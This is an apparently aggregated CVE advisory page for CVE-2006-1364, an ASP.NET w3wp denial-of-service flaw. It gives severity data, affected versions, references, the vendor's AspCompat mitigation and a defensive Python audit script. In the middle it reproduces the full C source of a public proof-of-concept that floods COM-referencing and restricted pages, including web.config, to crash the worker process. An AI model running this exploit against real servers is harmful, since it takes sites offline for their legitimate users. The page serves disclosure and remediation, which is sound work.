CVE-2006-1364
CVSS 7.8
Published: 2006-03-23 06:06:00
Revised: 2008-09-05 17:01:43
NMCOES    

[Original] Microsoft w3wp (aka w3wp.exe) does not properly handle the case where the AspCompat directive is not used when referencing COM components in ASP.NET, which allows remote attackers to cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or restricted documents located under the ASP.NET application path.


[CNNVD] Microsoft ASP.NET COM Components W3WP Remote Denial of Service Vulnerability (CNNVD-200603-384)

        Microsoft w3wp (aka w3wp.exe) does not handle the case properly where the AspCompat directive is not used when COM components are referenced from ASP.NET. A remote attacker can cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or restricted documents located under the ASP.NET application path.

- CVSS (base score)

CVSS score: 7.8 [HIGH]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:microsoft:asp.net:1.0:sp2
cpe:/a:microsoft:asp.net  (Microsoft ASP.NET)
cpe:/a:microsoft:asp.net:1.0:sp1
cpe:/a:microsoft:asp.net:1.1  (Microsoft ASP.NET 1.1)
cpe:/a:microsoft:asp.net:1.0  (Microsoft ASP.NET 1.0)
cpe:/a:microsoft:asp.net:1.1:sp1  (Microsoft ASP.NET 1.1 SP1)

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1364
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1364
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-384
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/17188
(UNKNOWN)  BID  17188
http://www.securiteam.com/windowsntfocus/5KP0O0KI0Y.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5KP0O0KI0Y.html
http://www.milw0rm.com/exploits/1601
(UNKNOWN)  MILW0RM  1601
http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip
(UNKNOWN)  MISC  http://hackingspirits.com/vuln-rnd/w3wp-remote-dos.zip
http://xforce.iss.net/xforce/xfdb/25392
(UNKNOWN)  XF  ms-aspnet-w3wp-dos(25392)
http://www.securityfocus.com/archive/1/archive/1/428622/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060322 w3wp remote DoS
http://securitytracker.com/id?1015825
(UNKNOWN)  SECTRACK  1015825
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044292.html
(UNKNOWN)  FULLDISC  20060322 w3wp remote DoS
http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044291.html
(UNKNOWN)  FULLDISC  20060322 w3wp remote DoS due to improper reference of STA COM components in ASP.NET

- Vulnerability information

Microsoft ASP.NET COM Components W3WP Remote Denial of Service Vulnerability
High  Design Error
2006-03-23 00:00:00 2006-03-27 00:00:00
Remote
        Microsoft w3wp (aka w3wp.exe) does not handle the case properly where the AspCompat directive is not used when COM components are referenced from ASP.NET. A remote attacker can cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or restricted documents located under the ASP.NET application path.

- Advisory and patches

        The vendor has released an upgrade patch to fix this security issue; the related updates have been published by the vendor.

- Vulnerability information (1601)

ASP.NET w3wp (COM Components) Remote Crash Exploit (EDBID:1601)
windows dos
2006-03-22 Verified
0 Debasis Mohanty
N/A
// w3wp-dos.c
//
// ASP.NET w3wp (COM components) remote crash PoC by Debasis Mohanty.
// Compile as C++ with MSVC on Windows (it uses new/delete; ws2_32 is linked by the pragma).
// Each link listed in pszUnauthLinks() is requested REQS_PER_LINK times over one
// keep-alive connection before moving on to the next link.

#pragma comment (lib,"ws2_32")

#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define portno		80
#define NUM_LINKS	9	/* entries in the szBuff[] table of pszUnauthLinks(), indexed 1..NUM_LINKS */
#define REQS_PER_LINK	8	/* requests sent per link, as in the original */

static char g_szHostHeader[MAX_PATH];	/* target as given on the command line; sent in the Host: header */

char * pszUnauthLinks(DWORD);

static void banner(void)
{
	printf("============================================\n");
	printf("\t\t w3wp-dos by Debasis Mohanty\n");
	printf("\t\t www.hackingspirits.com\n");
	printf("============================================\n");
}

int main(int argc, CHAR* argv[])
{
	char	szWorkBuff[100];
	char	szTargetHost[MAX_PATH];
	DWORD	dwCount = 0, dwCounter;
	int	iRetval;

	SOCKET	conn_socket; 
	WSADATA wsaData;
	struct	sockaddr_in sin;
	struct	hostent *phostent;
	UINT	uAddr; 

	if (argc<2)
	{
		banner();
		printf("\nUsage: w3wpdos <HostIP / HostName> \n\n");
		exit(0);
	}

	if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {
		printf( "WSAStartup failed with error %d\n",iRetval);
		exit(1); }

	// Make a check on the length of the parameter provided (leave room for the NUL)
	if (strlen(argv[1]) >= MAX_PATH)	{ 
		printf( "Too long parameter ....\n"); WSACleanup(); exit(1); }
	strcpy(szTargetHost, argv[1]);
	strcpy(g_szHostHeader, argv[1]);

	// Resolve the hostname into IP address or vice-versa
	if(isalpha((unsigned char)szTargetHost[0])) 
		phostent = gethostbyname(szTargetHost);
	else  { 
		uAddr = inet_addr(szTargetHost);
		phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);

		if(phostent != NULL) {
			strncpy(szTargetHost, phostent->h_name, MAX_PATH - 1);
			szTargetHost[MAX_PATH - 1] = '\0';
		}
		else	{
			printf( "Failed to resolve IP address, please provide host name.\n" );
			WSACleanup();
			exit(1);	
		}
	}

	if (phostent == NULL )	{
		printf("Cannot resolve address [%s]: Error %d\n", szTargetHost, 
			WSAGetLastError());

		WSACleanup();
		printf( "Target host seems to be down or the program failed to resolve host name.\n");
		printf( "Press enter to exit" );

		getchar();
		exit(1); }

	// Initialise Socket info
	memset(&sin,0,sizeof(sin));
	memcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(portno);

	banner();

	printf("[+] Host name: %s\n", szTargetHost);
	wsprintf( szWorkBuff, "%u.%u.%u.%u", 
		sin.sin_addr.S_un.S_un_b.s_b1,
		sin.sin_addr.S_un.S_un_b.s_b2,
		sin.sin_addr.S_un.S_un_b.s_b3,
		sin.sin_addr.S_un.S_un_b.s_b4 );
	printf("[+] Host IP: %s\n", szWorkBuff);

	printf("[+] Ready to generate requests\n");

	/* NUM_LINKS must match the number of links in the szBuff array of
	   pszUnauthLinks(); the original loop ran one index past the table. */
	while(dwCount++ < NUM_LINKS) 
	{						
		char *pszRequest = pszUnauthLinks(dwCount);	/* built once per link, freed below */

		conn_socket = socket(AF_INET, SOCK_STREAM, 0);
		if (conn_socket == INVALID_SOCKET)	{
			printf("Error Opening socket: Error %d\n", WSAGetLastError());
			delete[] pszRequest;
			break; }

		if(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)	{
			printf("connect failed: Error %d\n", WSAGetLastError());
			closesocket(conn_socket);
			delete[] pszRequest;
			continue; }

		printf( "[%lu] %s", (unsigned long)dwCount, pszRequest);
		for(dwCounter=1;dwCounter <= REQS_PER_LINK;dwCounter++) 
		{
			char szBuffer[256];

			send(conn_socket, pszRequest, (int)strlen(pszRequest), 0);
			/* Read the start of the reply only so the server keeps serving the
			   keep-alive connection; the content is not inspected. */
			recv(conn_socket, szBuffer, sizeof(szBuffer), 0);
			printf(".");
			Sleep(100);
		}
		printf("\n");
		closesocket(conn_socket);
		delete[] pszRequest;
	}

	WSACleanup();
	return 0;
}


char * pszUnauthLinks( DWORD dwIndex )
{
	const char	*szBuff[NUM_LINKS + 1];
	char		*szGetReqH = new char[2048];	/* caller frees with delete[] */

	/*	Modify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app path. Keep NUM_LINKS equal to the number of entries.	*/

	szBuff[0] = "";						// unused; the table is 1-based
	szBuff[1] = "GET /aspnet-app\\web.config";
	szBuff[2] = "GET /aspnet-app\\../aspnetlogs\\log1.logs";
	szBuff[3] = "GET /aspnet-app\\default-userscreen.aspx";
	szBuff[4] = "GET /aspnet-app\\users/config.aspx";
	szBuff[5] = "GET /aspnet-app\\links/anycomref.aspx";	//
	szBuff[6] = "GET /aspnet-app\\com-ref-link1.aspx";		// Links of pages referring 
	szBuff[7] = "GET /aspnet-app\\com-ref-link2.aspx";		// COM components.
	szBuff[8] = "GET /aspnet-app\\com-ref-link3.aspx";		//
	szBuff[9] = "GET /aspnet-app\\com-ref-link4.aspx";		//

	if (dwIndex < 1 || dwIndex > NUM_LINKS)	// never read past the table
		dwIndex = 1;

	/* Prepare the GET request for the desired link */
	strcpy(szGetReqH, szBuff[dwIndex]);
	strcat(szGetReqH, " HTTP/1.1\r\n");
	strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
	strcat(szGetReqH, "Accept-Language: en-us\r\n");
	strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");
	strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");
	strcat(szGetReqH, "Host: " );		// HTTP/1.1 requires a Host value; the original sent it empty
	strcat(szGetReqH, g_szHostHeader );
	strcat(szGetReqH, "\r\n" );
	strcat(szGetReqH, "Connection: Keep-Alive\r\n" );

	/* Insert a valid session cookie and .ASPXAUTH forms-auth ticket to get a more effective result.
	   Both belong in the one Cookie: header, separated by "; "; the original sent .ASPXAUTH
	   as a separate line with no header name, which is not a valid header. */
	strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri; " );
	strcat(szGetReqH, ".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );

	return szGetReqH;
}

// milw0rm.com [2006-03-22]

- Vulnerability information

30402
Microsoft w3wp Crafted COM Component Request DoS
Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- Vulnerability description

- Timeline

2006-03-22 Unknown
2006-03-21 Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Microsoft ASP.NET COM Components W3WP Remote Denial Of Service Vulnerability
Design Error 17188
Yes No
2006-03-22 12:00:00 2007-06-27 10:18:00
Debasis Mohanty is credited with the discovery of this vulnerability.

- Affected program versions

Microsoft ASP.NET 1.1 SP1
Microsoft ASP.NET 1.1
Microsoft ASP.NET 1.0 SP2
Microsoft ASP.NET 1.0 SP1
Microsoft ASP.NET 1.0
Microsoft ASP.NET 0

- Vulnerability discussion

Improper access of COM and COM+ components in ASP.NET applications can cause a denial-of-service condition in 'w3wp.exe' processes.

A remote attacker can exploit this issue to cause denial-of-service conditions in applications using improperly coded ASP.NET, effectively denying service to legitimate users.

- Exploit

The following proof-of-concept exploit is available:

- Solution

According to the vendor, supplying the following @Page directive in ASP.NET applications will alleviate this problem:

<%@Page ASPCompat="true" %>
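The directive above only helps on pages that actually get it, so the practical question for an operator is which pages in an ASP.NET 1.x application reference COM without it. The script below is an added example for this advisory, not code from Microsoft, the advisory, or the exploit author: it walks an application tree, reads each .aspx @Page directive (following a CodeBehind/CodeFile/Src file when one is declared, which goes beyond what the advisory describes), looks for a few heuristic source markers of COM use (the COM_MARKERS table is an assumption, not an official check), and reports pages where COM is touched but AspCompat="true" is absent. The sample pages it writes and the LegacyLib.ReportEngine COM class they call are constructed for the demo.

```python
"""Audit an ASP.NET app tree for pages that reach COM without AspCompat="true".

Added example for this advisory; not from Microsoft, the advisory, or the exploit
author. COM_MARKERS is a heuristic (an assumption); the sample pages and the
LegacyLib.ReportEngine COM server they call are constructed for the demo.
"""
import os
import re
import tempfile

PAGE_DIRECTIVE_RE = re.compile(r'<%@\s*Page\b(?P<attrs>.*?)%>', re.IGNORECASE | re.DOTALL)
ASPCOMPAT_TRUE_RE = re.compile(r'\bAspCompat\s*=\s*"?\s*true\s*"?', re.IGNORECASE)
CODEBEHIND_RE = re.compile(r'\b(?:CodeBehind|CodeFile|Src)\s*=\s*"([^"]+)"', re.IGNORECASE)

# Source patterns that indicate COM use (heuristic, not an official Microsoft check).
COM_MARKERS = {
    "Server.CreateObject": re.compile(r'\bServer\.CreateObject\s*\('),
    "GetTypeFromProgID/CLSID": re.compile(r'\bType\.GetTypeFrom(?:ProgID|CLSID)\s*\('),
    "ComImport attribute": re.compile(r'\[\s*ComImport\s*\]'),
    "InteropServices namespace": re.compile(r'\bSystem\.Runtime\.InteropServices\b'),
    "tlbimp *Class wrapper": re.compile(r'\bnew\s+[\w.]+Class\s*\('),
}


def page_has_aspcompat(aspx_text):
    """True when the @Page directive carries AspCompat="true" (case-insensitive, as ASP.NET accepts)."""
    m = PAGE_DIRECTIVE_RE.search(aspx_text)
    return bool(m and ASPCOMPAT_TRUE_RE.search(m.group("attrs")))


def find_com_markers(source):
    """Names of the COM_MARKERS found in a page or code-behind source."""
    return sorted(label for label, rx in COM_MARKERS.items() if rx.search(source))


def audit_page(aspx_path):
    """Check one .aspx, plus its code-behind file if one is declared and present."""
    with open(aspx_path, encoding="utf-8", errors="replace") as f:
        aspx = f.read()
    sources = [aspx]
    m = PAGE_DIRECTIVE_RE.search(aspx)
    cb = CODEBEHIND_RE.search(m.group("attrs")) if m else None
    if cb:
        cb_path = os.path.join(os.path.dirname(aspx_path), cb.group(1))
        if os.path.isfile(cb_path):
            with open(cb_path, encoding="utf-8", errors="replace") as f:
                sources.append(f.read())
    markers = find_com_markers("\n".join(sources))
    aspcompat = page_has_aspcompat(aspx)
    return {"path": aspx_path, "aspcompat": aspcompat, "com_markers": markers,
            "exposed": bool(markers) and not aspcompat}


def audit_app(root):
    """Audit every .aspx under root; returns one result dict per page."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(".aspx"):
                results.append(audit_page(os.path.join(dirpath, name)))
    return results


# Constructed sample application (LegacyLib.* is a hypothetical STA COM server).
SAMPLE_APP = {
    "inline.aspx": ('<%@ Page Language="C#" %>\n<script runat="server">\n'
                    'void Page_Load(object s, EventArgs e) {\n'
                    '  LegacyLib.ReportEngine eng = new LegacyLib.ReportEngineClass();\n'
                    '  Response.Write(eng.Render());\n}\n</script>'),
    "Report.aspx": '<%@ Page Language="C#" CodeBehind="Report.aspx.cs" Inherits="App.Report" %>',
    "Report.aspx.cs": ('using System;\nusing System.Runtime.InteropServices;\n'
                       'namespace App { public class Report : System.Web.UI.Page {\n'
                       '  void Page_Load(object s, EventArgs e) {\n'
                       '    object eng = Activator.CreateInstance(Type.GetTypeFromProgID("LegacyLib.ReportEngine"));\n'
                       '    Marshal.ReleaseComObject(eng);\n  } } }'),
    "fixed.aspx": ('<%@Page Language="C#" ASPCompat="true" %>\n<script runat="server">\n'
                   'void Page_Load(object s, EventArgs e) {\n'
                   '  LegacyLib.ReportEngine eng = new LegacyLib.ReportEngineClass();\n'
                   '}\n</script>'),
    "clean.aspx": '<%@ Page Language="C#" %>\n<html><body>no COM here</body></html>',
}


def demo():
    """Write SAMPLE_APP to a temp dir, audit it, return the names of exposed pages."""
    root = tempfile.mkdtemp(prefix="aspnet-aspcompat-audit-")
    for name, text in SAMPLE_APP.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as f:
            f.write(text)
    return sorted(os.path.basename(r["path"]) for r in audit_app(root) if r["exposed"])


if __name__ == "__main__":
    for name in demo():
        print("COM referenced without AspCompat:", name)
```

Run against the constructed app it reports inline.aspx and Report.aspx; fixed.aspx carries the directive and clean.aspx never touches COM. Two caveats when using this on a real tree: AspCompat matters only for single-threaded apartment components (ThreadingModel=Apartment in the component's registry entry), and it moves the page onto an STA thread, which serialises those calls and costs throughput, so a flagged page that uses a free-threaded or "Both" component is a false positive and the registry value is the authoritative check.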

- References